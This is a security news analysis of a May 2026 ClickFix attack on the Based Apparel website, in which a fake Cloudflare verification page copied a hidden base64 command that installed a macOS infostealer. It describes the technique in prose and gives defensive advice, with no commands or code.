The Copy Button Lied: A ClickFix Attack Hid an Infostealer Behind a Fake Cloudflare Check on the Based Apparel Site

ClickFix is the fast-spreading 2026 social-engineering pattern where a website tricks the visitor into running the attacker's command themselves. On May 22, 2026, the merchandise site Based Apparel was pulled offline after reports it had been compromised to serve exactly such an attack: a spoofed Cloudflare verification page whose 'copy' button silently placed a base64-encoded shell command on the clipboard, then prompted visitors to paste the 'verification' string into their own terminal. ClickFix defeats most web-malware defenses because the malicious code never executes in the browser — the victim runs it. A compromised brand website is simply the delivery vehicle; the technique is the threat.

WASHINGTON, D.C. — On May 22, 2026, the merchandise website Based Apparel (basedapparel[.]com) was taken offline after reports that it had been compromised to distribute malware to visitors using a social-engineering technique known as ClickFix. According to reporting led by TechCrunch, visitors to the site were shown a fake Cloudflare verification page displaying innocuous-looking text — "I am not a robot: Cloudflare Verification ID: 801470" — alongside a "copy" button. Clicking the button did not copy the visible text; it silently placed a base64-encoded shell command on the visitor's clipboard, and the page then prompted the user to paste the "verification" string into their computer's terminal, which executed the hidden command. On macOS, the documented payload downloaded an infostealer that harvested stored credentials from Chromium-based browsers and data from cryptocurrency wallets, bundled them into a zip archive, and sent them to an attacker-controlled domain; the payload was flagged as malicious by 27 antivirus engines. Based Apparel is the clothing brand of FBI Director Kash Patel, but the news value here is the technique, not the brand — a compromised brand website is one delivery vehicle for ClickFix among many.

What Happened

What ClickFix Is and Why It Works

ClickFix is a social-engineering technique, not a software exploit, and that distinction is the whole story. In a ClickFix attack, a website does not try to run malicious code inside the visitor's browser — the place where browser sandboxes, web filters, and email-gateway defenses are designed to catch it. Instead, it persuades the visitor to copy a string and run it themselves, in their own terminal, PowerShell, or Run dialog. The attacker's code therefore never executes in the browser at all; it executes as a command the user typed, with the user's own permissions. Because the malicious step happens outside the browser and outside email, most web-malware and phishing defenses simply never see it. That is why ClickFix has become one of the fastest-growing social-engineering patterns of 2026: it sidesteps the defenses organizations have spent years building.

How the Fake Cloudflare Check Worked

On the compromised Based Apparel site, the ClickFix lure took the form of a fake, spoofed Cloudflare verification page — a page designed to imitate the routine "checking your browser" or "verify you are human" screens that real content-delivery networks sometimes show. This was not a genuine Cloudflare page and Cloudflare's systems were not involved; it was attacker-controlled content built to borrow Cloudflare's familiar look. The page displayed harmless-looking text — "I am not a robot: Cloudflare Verification ID: 801470" — next to a "copy" button. The deception is in what the button actually did. Clicking "copy" did not place the visible verification text on the clipboard; it silently placed a different string entirely — a base64-encoded shell command. The page then instructed the visitor to paste that "verification" string into their computer's terminal, presenting the act of executing a command as a normal final step of proving they were human.

What the Documented Payload Did

Reporting documents the macOS path of the attack in detail. Once a visitor pasted and ran the hidden command in a macOS terminal, it downloaded an infostealer — a class of malware built to collect and exfiltrate data. The documented payload harvested stored credentials from Chromium-based browsers, the family that includes Chrome, Edge, Brave, and others, and collected data from cryptocurrency wallets installed on the machine. It then bundled what it had gathered into a single zip archive and sent that archive to a domain controlled by the operator. The payload was submitted to multi-engine antivirus scanning and flagged as malicious by 27 separate engines, which classified it as a Trojan and an infostealer. Reporting notes the site presented operating-system-specific instructions; the malicious path is documented for macOS, and the Windows-path payload, if any, has not been detailed.

Scope and Impact

The most useful way to read this incident is to separate the vehicle from the technique. The vehicle — a compromised brand merchandise site — is interchangeable; the technique, ClickFix, is the part that generalizes and the part defenders should focus on. ClickFix has been a recurring thread in 2026 threat activity, and The CyberSignal has tracked it across very different operators and platforms: North Korean actors deploying AppleScript-based ClickFix chains against macOS users, and Australia's national cyber agency warning that fake Cloudflare CAPTCHA pages were being used to push the Vidar infostealer — a pattern that closely mirrors the lure described on the Based Apparel site. It also sits alongside the broader wave of fake-CAPTCHA and verification scams documented across global fraud campaigns. Across all of these, the constant is not the brand, the country, or the malware family — it is the trick of getting the human to run the command.

What the technique sidesteps is significant. ClickFix bypasses browser sandboxing, web content filtering, and email security because the malicious code is never delivered as an attachment, a drive-by browser exploit, or a script the browser runs — it is delivered as plain text the user copies and a command the user voluntarily executes. That places it squarely in the category of human-layer attacks that have proven hardest to defend with technology alone. Verizon's 2026 Data Breach Investigations Report underscored how durable social-engineering and credential-driven intrusion paths remain, and ClickFix is a clean example of why: it converts a routine, trusted interface — a verification check — into a delivery mechanism, much as fake software-update prompts have been abused to push mobile spyware in cases like the Morpheus Android campaign.

Several things about this specific incident are not confirmed, and this account should not imply otherwise. No threat actor has been identified or attributed. How the Based Apparel website was initially compromised — whether through a content-management-system vulnerability, stolen credentials, a malicious plugin, or a hosting compromise — is unknown. The specific infostealer family has not been named, the attacker-controlled exfiltration domain has not been published, and the number of visitors affected or whose credentials were taken has not been established. One outlet, IBTimes UK, framed the incident as a repeat targeting of the site owner's online presence; that "again" characterization is that outlet's framing and is not independently established here. When the site will return, and whether it has been fully remediated, also remain open.

Response and Attribution

The single most important defender lesson from this incident is behavioral and it applies to every computer user: never paste anything into your terminal, PowerShell, or a Run dialog because a website told you to. No legitimate "verify you are human" check — from Cloudflare or anyone else — ever requires you to run a command on your own machine. That one rule defeats every ClickFix attack, regardless of which website delivers it or which malware sits at the end of the chain. A practical companion habit: be aware that a "copy" button can place text on your clipboard that differs from what is shown on screen. Before pasting anything consequential, paste it first into a visible text editor and read it. A long base64-encoded blob where you expected a short verification code is an immediate red flag, and seeing it is the moment to stop.

For security teams, ClickFix belongs in security-awareness training now, because it works by getting the user to execute the payload and therefore bypasses browser and email defenses. Threat hunters can look for the technique's execution signature: a terminal or PowerShell process spawned shortly after browser activity, decoding base64 and fetching a remote payload — and clipboard-monitoring DLP or EDR rules that flag base64-decoded shell execution following a paste are worth considering. Organizations that run brand, merchandise, or marketing websites should treat those properties as high-trust malware-delivery surfaces: keep content-management systems and plugins patched, enforce multi-factor authentication on every admin and hosting account, monitor for unauthorized content or script injection, and keep a takedown-and-incident-response runbook ready — pulling the site offline, as Based Apparel did, was the correct immediate move. When a site is found serving ClickFix content, scope the incident to its visitors during the exposure window, not just the web server: affected users should rotate every credential stored in Chromium-based browsers and move cryptocurrency-wallet assets, treating the device as compromised. Attribution is not established, and none should be assumed.

The CyberSignal Analysis

Signal 01 — The Threat Is the Technique, Not the Website

It would be easy to file this story under the brand whose site was compromised, but that framing misses the actual risk. The compromised website is a delivery vehicle, and delivery vehicles are interchangeable — the next ClickFix campaign will run on a different site, possibly one with no notable owner at all. The durable, transferable lesson is the technique. ClickFix succeeds because it relocates the malicious step out of the browser and into the user's own command line, where the defenses an organization has invested in simply do not operate. Coverage that leads with the brand teaches readers nothing they can use; coverage that leads with the technique teaches them the one rule that protects them on every site they will ever visit.

Signal 02 — A Copy Button Is Not a Safe Surface

The mechanical heart of this attack is a quiet assumption almost everyone makes: that a "copy" button copies what you see. It does not have to. The clipboard is programmable, and a page can place any string it wants there when a button is clicked — including a string entirely different from the visible text. ClickFix weaponizes that gap between what is displayed and what is copied. The practical defense is to close the gap manually: treat the clipboard as untrusted after interacting with any unfamiliar page, and paste consequential content into a plain text editor to inspect it before it goes anywhere else. The habit is small; the failure it prevents — running an attacker's command with your own hands — is not.

Signal 03 — ClickFix Defeats Tools, So the Defense Is Behavioral

ClickFix is, in a real sense, a verdict on the limits of purely technical security. Browser sandboxes, web filters, and email gateways are all bypassed not because they failed, but because the attack never passes through them. The decisive control is the user's judgment at the moment a website asks them to run a command. That makes the defense a behavioral and awareness investment, not a product purchase — and it means brand, marketing, and merchandise web properties, often managed outside the core security program, need to be brought inside it, because a high-trust website is exactly the kind of place a ClickFix lure wants to live. For CISOs, the takeaway is uncomfortable but clear: against a technique designed to bypass tools, sustained training is not a soft control. It is the control.

Sources